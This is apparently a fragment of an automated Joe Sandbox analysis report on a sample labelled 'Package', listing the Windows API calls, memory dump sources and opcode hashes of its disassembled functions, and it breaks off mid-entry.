                                                                          • API String ID: 4178481822-0
                                                                          • Opcode ID: e58633bced6d5a45809b51faafe11d84fbc9487d8c942ae8110a08502053bd4b
                                                                          • Instruction ID: f98c2e3815b8fd9fcb2bc1dd3388134b58f087e257199e7b5d279c91c586069c
                                                                          • Opcode Fuzzy Hash: e58633bced6d5a45809b51faafe11d84fbc9487d8c942ae8110a08502053bd4b
                                                                          • Instruction Fuzzy Hash: 0F01A572281A167AE225E6A09C46FEAB35CEF46701F404126BA14D60C1DBB4AA158AF6
                                                                          APIs
                                                                          • type_info::operator==.LIBVCRUNTIME ref: 6E2F33AE
                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 6E2F34BC
                                                                          • _UnwindNestedFrames.LIBCMT ref: 6E2F360E
                                                                          • CallUnexpected.LIBVCRUNTIME ref: 6E2F3629
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 2751267872-393685449
                                                                          • Opcode ID: df648c3ceaa7838ac009755dcc1985e9fda5173623b27949e0894758f6bf2019
                                                                          • Instruction ID: 66e70b837965d4f2e12e7ec83a110147e14f5ee972b575a35057013262f79e96
                                                                          • Opcode Fuzzy Hash: df648c3ceaa7838ac009755dcc1985e9fda5173623b27949e0894758f6bf2019
                                                                          • Instruction Fuzzy Hash: EDB15BB588020EEFCF15CFE4C94899EFBBABF48316B104559E8116B215DB31DA52CF92
                                                                          APIs
                                                                          • RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000050), ref: 00D36789
                                                                          • RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 00D367AB
                                                                          • RegQueryValueExW.ADVAPI32(?,409,00000000,00000000,?,00000200), ref: 00D367E0
                                                                          • wsprintfW.USER32 ref: 00D36813
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D3690C
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00D3691D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: Close$EnumOpenQueryValuewsprintf
                                                                          • String ID: %s <no name>$409
                                                                          • API String ID: 3624944744-596716345
                                                                          • Opcode ID: 1f695e1102203e8329f22177612bd78338dec2b42ad7c8dcd86ea9bca9027581
                                                                          • Instruction ID: 7245bda8b059a11ada49f504226462f6fdcefde9660565553eb838501e003ea2
                                                                          • Opcode Fuzzy Hash: 1f695e1102203e8329f22177612bd78338dec2b42ad7c8dcd86ea9bca9027581
                                                                          • Instruction Fuzzy Hash: 2341DD74A012289FDB60DF64DC45BA9B7BABF89304F1441E5E509E7250DB329EE4CF20
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(00000000,?,6E2F858B,00000022,FlsSetValue,6E300550,6E300558,00000000,?,6E2F68CF,FFFFFFFF,000000FF,?,?,6E2F4C74), ref: 6E2F8367
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary
                                                                          • String ID: api-ms-$ext-ms-$tL/n
                                                                          • API String ID: 3664257935-1946474827
                                                                          • Opcode ID: fda7be7cd6226908d171a49284d53d47965354778124f47e16edba26d902b999
                                                                          • Instruction ID: b41fd6613e95648fae30402351b0297c1890d519d3e078d7a5f71f1c13495170
                                                                          • Opcode Fuzzy Hash: fda7be7cd6226908d171a49284d53d47965354778124f47e16edba26d902b999
                                                                          • Instruction Fuzzy Hash: 292138315C161AEFDB159AA6CC44E8FF76A9F423B1B244125EC11A7294DB30ED02CBA0
                                                                          APIs
                                                                          • RegOpenKeyW.ADVAPI32(00D37AC1,InprocServer32,00000000), ref: 00D379C7
                                                                          • RegOpenKeyW.ADVAPI32(00D37AC1,InprocHandler32,00000000), ref: 00D379DD
                                                                          • RegOpenKeyW.ADVAPI32(00D37AC1,LocalServer32,00000000), ref: 00D379F3
                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,00D37AC1), ref: 00D37A00
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: Open$Close
                                                                          • String ID: InprocHandler32$InprocServer32$LocalServer32
                                                                          • API String ID: 3083169812-2616365248
                                                                          • Opcode ID: 5314ca2dc6ee76f595209b83347a8d1db29027bf00b074e5aa74734f76a3e1de
                                                                          • Instruction ID: 158c8463596e0deb37f90ab2eda68c05da939b3b2ba4518cfb35d3c9acdd1ce5
                                                                          • Opcode Fuzzy Hash: 5314ca2dc6ee76f595209b83347a8d1db29027bf00b074e5aa74734f76a3e1de
                                                                          • Instruction Fuzzy Hash: A3F01D75208208FFDB21CFA2DD09BAE7AB8EF01749F104024B901E0160D731DA55EA70
                                                                          APIs
                                                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,6E2FC2E2,00000000,00000000,00000000,00000001,?,?,?,?,00000001,00000000), ref: 6E2FC0B8
                                                                          • __alloca_probe_16.LIBCMT ref: 6E2FC173
                                                                          • __alloca_probe_16.LIBCMT ref: 6E2FC202
                                                                          • __freea.LIBCMT ref: 6E2FC24D
                                                                          • __freea.LIBCMT ref: 6E2FC253
                                                                          • __freea.LIBCMT ref: 6E2FC289
                                                                          • __freea.LIBCMT ref: 6E2FC28F
                                                                          • __freea.LIBCMT ref: 6E2FC29F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                          • String ID:
                                                                          • API String ID: 127012223-0
                                                                          • Opcode ID: 8607fd7072385df2fe1c485ce3223a61d68857dc92a60502d68aea1e1a517242
                                                                          • Instruction ID: 5d6100ce4e012571921a2e5b3dcbd771813c97de418dd0e0272afbf45100eb2c
                                                                          • Opcode Fuzzy Hash: 8607fd7072385df2fe1c485ce3223a61d68857dc92a60502d68aea1e1a517242
                                                                          • Instruction Fuzzy Hash: 2C71B27298420FDBEF118ED48C62F9FF7ABDF89B15F140859E914AB280D76588438798
                                                                          APIs
                                                                          • lstrlenW.KERNEL32(00D3D19D,?,80000000,00000000), ref: 00D3D846
                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00D221A0,00000000,000F003F,00000000,?,?,?,80000000,00000000), ref: 00D3D881
                                                                          • lstrcpyW.KERNEL32(?,00D3D19D,?,80000000,00000000), ref: 00D3D899
                                                                          • lstrlenW.KERNEL32(80000000,?,80000000,00000000), ref: 00D3D8A0
                                                                          • lstrlenW.KERNEL32(?,?,80000000,00000000), ref: 00D3D8B1
                                                                          • RegSetValueExW.ADVAPI32(?,80000000,00000000,00000001,?,00000000,?,80000000,00000000), ref: 00D3D8EA
                                                                          • RegCloseKey.ADVAPI32(?,?,80000000,00000000), ref: 00D3D8FC
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$CloseCreateValuelstrcpy
                                                                          • String ID:
                                                                          • API String ID: 2938206059-0
                                                                          • Opcode ID: eba29712e1563adeff745887bbb94080952138e144b32da6a2b13a6204b932a7
                                                                          • Instruction ID: 4bc49687b16a55adfd9a35ad2df4faf160744020259e39964605f21a17e1d0b1
                                                                          • Opcode Fuzzy Hash: eba29712e1563adeff745887bbb94080952138e144b32da6a2b13a6204b932a7
                                                                          • Instruction Fuzzy Hash: A52119BA600319ABDB109FA5ED49BEA77BDEB49300F004196F615D3151DA709A94CF70
                                                                          APIs
                                                                          • GetMessagePos.USER32 ref: 00D3210B
                                                                            • Part of subcall function 00D391B7: ScreenToClient.USER32(?,?), ref: 00D391C2
                                                                          • #3909.MFC42U(?,?,?,?,?,?), ref: 00D3218B
                                                                            • Part of subcall function 00D391E9: SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00D391FB
                                                                            • Part of subcall function 00D378FA: SendMessageW.USER32(?,0000113E,00000000,00000014), ref: 00D3790C
                                                                          • #6266.MFC42U(00000002,?,?,?,00000000,00000014,00000000,?,?,?,?,?), ref: 00D32479
                                                                          • #2430.MFC42U(00000002,?,?,?,00000000,00000014,00000000,?,?,?,?,?), ref: 00D32484
                                                                          • #2430.MFC42U(00000002,?,?,?,00000000,00000014,00000000,?,?,?,?,?), ref: 00D3248F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: Message$#2430Send$#3909#6266ClientScreen
                                                                          • String ID: TypeLib
                                                                          • API String ID: 852555880-4260498707
                                                                          • Opcode ID: 58f4adffea7e829f77fdf66384af9094916dedf4b8b3143ffe5a9e1046f7d5b0
                                                                          • Instruction ID: c2a157c8fd2099319d47c28830282ac0dc85c803f199740e8525027998160430
                                                                          • Opcode Fuzzy Hash: 58f4adffea7e829f77fdf66384af9094916dedf4b8b3143ffe5a9e1046f7d5b0
                                                                          • Instruction Fuzzy Hash: 8EA1E371D412299BEB64EF54DC8ABECB3B1EB14705F1041E9A1496A1E1CB746EC8CF21
                                                                          APIs
                                                                          • __RTC_Initialize.LIBCMT ref: 6E2F11C4
                                                                          • ___scrt_uninitialize_crt.LIBCMT ref: 6E2F11DE
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize___scrt_uninitialize_crt
                                                                          • String ID:
                                                                          • API String ID: 2442719207-0
                                                                          • Opcode ID: e3dcd1847b1d0e21d27ae92588159fd439da5d8cf69602fe398694544f94d85a
                                                                          • Instruction ID: c74df18a8d5e42dee83151d86de6fd5722e02ea3f9669107853a22187b36c4ec
                                                                          • Opcode Fuzzy Hash: e3dcd1847b1d0e21d27ae92588159fd439da5d8cf69602fe398694544f94d85a
                                                                          • Instruction Fuzzy Hash: 7141D6B2E8566DEFDB108FD5C900B9EB6BFEB41655F904519E810A7242C7304DCB8B90
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: isspace$isdigit$isxdigittoupper
                                                                          • String ID:
                                                                          • API String ID: 4280169866-0
                                                                          • Opcode ID: c378ced1b2d9dd913e129da89db3f33828874aea9afe30eda359ee14477294b1
                                                                          • Instruction ID: e5fddabd4fca2e0a7250fc5d569c67ea65696cc20c6a283042ae882498d559f7
                                                                          • Opcode Fuzzy Hash: c378ced1b2d9dd913e129da89db3f33828874aea9afe30eda359ee14477294b1
                                                                          • Instruction Fuzzy Hash: 81319EB6910221CBCB241F69EC44572B7EAFF59771B2A452AF8C5C7280E774CC80DAB0
                                                                          APIs
                                                                          • _ValidateLocalCookies.LIBCMT ref: 6E2F1C87
                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6E2F1C8F
                                                                          • _ValidateLocalCookies.LIBCMT ref: 6E2F1D18
                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6E2F1D43
                                                                          • _ValidateLocalCookies.LIBCMT ref: 6E2F1D98
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                          • String ID: csm
                                                                          • API String ID: 1170836740-1018135373
                                                                          • Opcode ID: 66906cc5a656e1d3f0e49e2c2f77cdb773afa917f86a04b197520a3451171eb2
                                                                          • Instruction ID: 6f8db84121bb7910516fcd0b1fc22dc3f9612295cbbdb5cd4de69b0b37af6335
                                                                          • Opcode Fuzzy Hash: 66906cc5a656e1d3f0e49e2c2f77cdb773afa917f86a04b197520a3451171eb2
                                                                          • Instruction Fuzzy Hash: BA41B17498025EDBDF00CFA8C880ADEFBB6AF06328F508555E8159B352C7319A96CB91
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D2D6BD
                                                                          • #364.MFC42U(0000007A,00000008,00D2D2DA,00000004), ref: 00D2D6C9
                                                                            • Part of subcall function 00D2C4B6: __EH_prolog3.LIBCMT ref: 00D2C4BD
                                                                            • Part of subcall function 00D2C4B6: #324.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C4CE
                                                                            • Part of subcall function 00D2C4B6: #567.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C4E5
                                                                            • Part of subcall function 00D2C4B6: #567.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C500
                                                                            • Part of subcall function 00D2C4B6: #567.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C516
                                                                            • Part of subcall function 00D2C4B6: #567.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C52C
                                                                            • Part of subcall function 00D309D5: __EH_prolog3.LIBCMT ref: 00D309DC
                                                                            • Part of subcall function 00D309D5: #324.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D309ED
                                                                            • Part of subcall function 00D309D5: #567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A04
                                                                            • Part of subcall function 00D309D5: #567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A1F
                                                                            • Part of subcall function 00D309D5: #567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A35
                                                                            • Part of subcall function 00D309D5: #567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A4B
                                                                            • Part of subcall function 00D309D5: #567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A61
                                                                            • Part of subcall function 00D2F346: __EH_prolog3.LIBCMT ref: 00D2F34D
                                                                            • Part of subcall function 00D2F346: #324.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F35E
                                                                            • Part of subcall function 00D2F346: #567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F375
                                                                            • Part of subcall function 00D2F346: #567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F38F
                                                                            • Part of subcall function 00D2F346: #567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F3AA
                                                                            • Part of subcall function 00D2F346: #567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F3C0
                                                                            • Part of subcall function 00D2F346: #567.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F3DA
                                                                            • Part of subcall function 00D2F346: #540.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F3EF
                                                                            • Part of subcall function 00D2F346: #540.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F400
                                                                            • Part of subcall function 00D2F346: #540.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F40F
                                                                            • Part of subcall function 00D2F346: #540.MFC42U(0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F420
                                                                            • Part of subcall function 00D2F346: #861.MFC42U(00D221A0,0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F436
                                                                            • Part of subcall function 00D2F346: #861.MFC42U(00D221A0,00D221A0,0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F442
                                                                            • Part of subcall function 00D2F346: #861.MFC42U(00D221A0,00D221A0,00D221A0,0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F453
                                                                            • Part of subcall function 00D2F346: #861.MFC42U(00D221A0,00D221A0,00D221A0,00D221A0,0000008B,00000000,00000008,00D2D701,0000007A,00000008,00D2D2DA,00000004), ref: 00D2F45F
                                                                            • Part of subcall function 00D2C962: __EH_prolog3.LIBCMT ref: 00D2C969
                                                                            • Part of subcall function 00D2C962: #324.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C97A
                                                                            • Part of subcall function 00D2C962: #567.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C991
                                                                            • Part of subcall function 00D2C962: #567.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C9AB
                                                                            • Part of subcall function 00D2C962: #540.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C9C2
                                                                            • Part of subcall function 00D2C962: #540.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C9D1
                                                                            • Part of subcall function 00D2C962: #861.MFC42U(00D221A0), ref: 00D2C9E8
                                                                            • Part of subcall function 00D39485: __EH_prolog3.LIBCMT ref: 00D3948C
                                                                            • Part of subcall function 00D39485: #326.MFC42U(00000008,00D2D71F,0000007A,00000008,00D2D2DA,00000004), ref: 00D39496
                                                                            • Part of subcall function 00D39485: #567.MFC42U(00000008,00D2D71F,0000007A,00000008,00D2D2DA,00000004), ref: 00D394AD
                                                                          • #567.MFC42U(0000007A,00000008,00D2D2DA,00000004), ref: 00D2D72E
                                                                          • #567.MFC42U(0000007A,00000008,00D2D2DA,00000004), ref: 00D2D748
                                                                          • #567.MFC42U(0000007A,00000008,00D2D2DA,00000004), ref: 00D2D763
                                                                          • #567.MFC42U(0000007A,00000008,00D2D2DA,00000004), ref: 00D2D779
                                                                          • #567.MFC42U(0000007A,00000008,00D2D2DA,00000004), ref: 00D2D78F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #567$#540H_prolog3$#861$#324$#326#364
                                                                          • String ID:
                                                                          • API String ID: 797904982-0
                                                                          • Opcode ID: cf4894534bc886d04fe8049d8cc0b2fdfa64c7f940beaddbf823b5f16b151063
                                                                          • Instruction ID: ce343b0f95fffad92e8bf0365310784f5d714677b4e52df42722553c72ef3dee
                                                                          • Opcode Fuzzy Hash: cf4894534bc886d04fe8049d8cc0b2fdfa64c7f940beaddbf823b5f16b151063
                                                                          • Instruction Fuzzy Hash: 36210A70A0565AEADB05EFA4C5113EDFBA0BF29304F50414DE48567382DBB82B15DBF2
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D309DC
                                                                          • #324.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D309ED
                                                                          • #567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A04
                                                                          • #567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A1F
                                                                          • #567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A35
                                                                          • #567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A4B
                                                                          • #567.MFC42U(00000087,00000000,00000008,00D2D6F2,0000007A,00000008,00D2D2DA,00000004), ref: 00D30A61
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #567$#324H_prolog3
                                                                          • String ID:
                                                                          • API String ID: 3217428371-0
                                                                          • Opcode ID: b7251d0b004f2f4e0cf1e2d48ee0c9bd23e34faa939ef0c07d7feec57d95b933
                                                                          • Instruction ID: 895ddd32a9c447004efa2ba362cb3415dea793d6d339dc42359507a2e9b528e5
                                                                          • Opcode Fuzzy Hash: b7251d0b004f2f4e0cf1e2d48ee0c9bd23e34faa939ef0c07d7feec57d95b933
                                                                          • Instruction Fuzzy Hash: 83110671A0136ADBDB059FA485023DCBBA0AF54700F60400DE58077381CBB81B45CBF2
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D2ED50
                                                                          • #498.MFC42U(00000090), ref: 00D2ED5A
                                                                            • Part of subcall function 00D2E941: __EH_prolog3.LIBCMT ref: 00D2E948
                                                                            • Part of subcall function 00D2E941: #489.MFC42U(0000008F,00000000,00000008,00D2E8DA,00000004), ref: 00D2E959
                                                                            • Part of subcall function 00D2E941: #567.MFC42U(0000008F,00000000,00000008,00D2E8DA,00000004), ref: 00D2E973
                                                                            • Part of subcall function 00D2E736: __EH_prolog3.LIBCMT ref: 00D2E73D
                                                                            • Part of subcall function 00D2E736: #489.MFC42U(00000090,00000000,00000008,00D2E6BA,00000004), ref: 00D2E74E
                                                                            • Part of subcall function 00D2E736: #567.MFC42U(00000090,00000000,00000008,00D2E6BA,00000004), ref: 00D2E768
                                                                            • Part of subcall function 00D3B460: __EH_prolog3.LIBCMT ref: 00D3B467
                                                                            • Part of subcall function 00D3B460: #489.MFC42U(0000008D,00000000,00000008,00D2ED96,00000090), ref: 00D3B478
                                                                            • Part of subcall function 00D3B460: #567.MFC42U(0000008D,00000000,00000008,00D2ED96,00000090), ref: 00D3B492
                                                                            • Part of subcall function 00D3B460: #567.MFC42U(0000008D,00000000,00000008,00D2ED96,00000090), ref: 00D3B4AD
                                                                          • #497.MFC42U(00D221A0,?,00000000,00000090), ref: 00D2EDAA
                                                                          • #771.MFC42U(00D221A0,?,00000000,00000090), ref: 00D2EDB5
                                                                          • #1008.MFC42U(?,00D221A0,?,00000000,00000090), ref: 00D2EDBD
                                                                            • Part of subcall function 00D3D4CD: GetVersionExW.KERNEL32(?), ref: 00D3D4F3
                                                                          • #1008.MFC42U(?,?,00D221A0,?,00000000,00000090), ref: 00D2EDCE
                                                                          • #1008.MFC42U(?,?,?,00D221A0,?,00000000,00000090), ref: 00D2EDDC
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
